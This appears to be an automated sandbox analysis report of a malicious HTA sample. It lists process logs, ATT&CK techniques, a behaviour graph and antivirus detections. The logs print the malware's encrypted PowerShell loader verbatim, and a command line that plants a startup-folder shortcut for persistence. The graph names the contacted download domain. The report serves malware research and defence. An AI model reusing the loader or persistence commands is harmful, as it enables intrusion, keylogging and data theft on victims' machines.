              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj | powershell -
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj | powershell -Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit
              Source: Identification.pif, 00000013.00000003.2424381489.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.0000000003FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A86210 cpuid 8_2_00A86210
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,8_2_00A75E70
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A74C30 lstrlenW,_DebugHeapAllocator,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,8_2_00A74C30

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts21
              Windows Management Instrumentation
              1
              Scripting
              1
              Exploitation for Privilege Escalation
              1
              Obfuscated Files or Information
              121
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Software Packing
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              12
              Process Injection
              1
              DLL Side-Loading
              Security Account Manager44
              System Information Discovery
              SMB/Windows Admin Shares121
              Input Capture
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts21
              PowerShell
              Login Hook1
              Registry Run Keys / Startup Folder
              121
              Masquerading
              NTDS121
              Security Software Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
              Virtualization/Sandbox Evasion
              LSA Secrets3
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Process Injection
              Cached Domain Credentials41
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1395895 Sample: setup.hta Startdate: 21/02/2024 Architecture: WINDOWS Score: 100 61 whitemansearch.shop 2->61 81 Multi AV Scanner detection for domain / URL 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for URL or domain 2->85 87 5 other signatures 2->87 12 mshta.exe 1 2->12         started        signatures3 process4 signatures5 95 Suspicious powershell command line found 12->95 15 powershell.exe 19 12->15         started        process6 signatures7 97 Found suspicious powershell code related to unpacking or dynamic code loading 15->97 99 Powershell drops PE file 15->99 18 powershell.exe 15 42 15->18         started        22 conhost.exe 15->22         started        process8 dnsIp9 63 whitemansearch.shop 5.101.153.86, 49716, 80 BEGET-ASRU Russian Federation 18->63 53 C:\Users\user\AppData\...\ClassroomEc.exe, PE32 18->53 dropped 24 ClassroomEc.exe 11 18->24         started        28 chrome.exe 9 18->28         started        31 WmiPrvSE.exe 18->31         started        file10 process11 dnsIp12 55 C:\Users\user\AppData\Local\...\Producing, PE32 24->55 dropped 89 Multi AV Scanner detection for dropped file 24->89 91 Contains functionality to register a low level keyboard hook 24->91 33 cmd.exe 1 24->33         started        36 conhost.exe 24->36         started        71 192.168.2.5, 274, 443, 49203 unknown unknown 28->71 73 239.255.255.250 unknown Reserved 28->73 38 chrome.exe 28->38         started        file13 signatures14 process15 dnsIp16 75 Uses ping.exe to sleep 33->75 77 Drops PE files with a suspicious file extension 33->77 79 Uses ping.exe to check the status of other devices and networks 33->79 41 Identification.pif 33->41         started        45 cmd.exe 2 33->45         started        47 conhost.exe 33->47         started        49 7 other processes 33->49 65 142.250.64.78 GOOGLEUS United States 38->65 67 142.250.64.99 GOOGLEUS United States 38->67 69 6 other IPs or domains 38->69 signatures17 process18 file19 57 C:\Users\user\AppData\Local\...57euraLink.pif, PE32 41->57 dropped 93 Drops PE files with a suspicious file extension 41->93 51 cmd.exe 41->51         started        59 C:\Users\user\AppData\...\Identification.pif, PE32 45->59 dropped signatures20 process21

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              setup.hta0%ReversingLabs
              setup.hta2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif5%ReversingLabs
              C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif4%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif4%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing3%ReversingLabs
